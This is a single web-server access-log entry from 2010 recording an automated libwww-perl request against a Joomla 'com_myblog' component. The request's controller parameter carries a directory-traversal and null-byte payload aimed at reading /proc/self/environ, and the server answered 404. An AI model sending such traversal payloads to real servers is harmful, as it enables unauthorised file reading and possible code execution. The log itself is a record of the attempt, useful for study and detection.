200.43.180.250 - - [30/May/2010:21:52:27 -0500] "GET /logs/access_log.1273363200///index2.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.834"
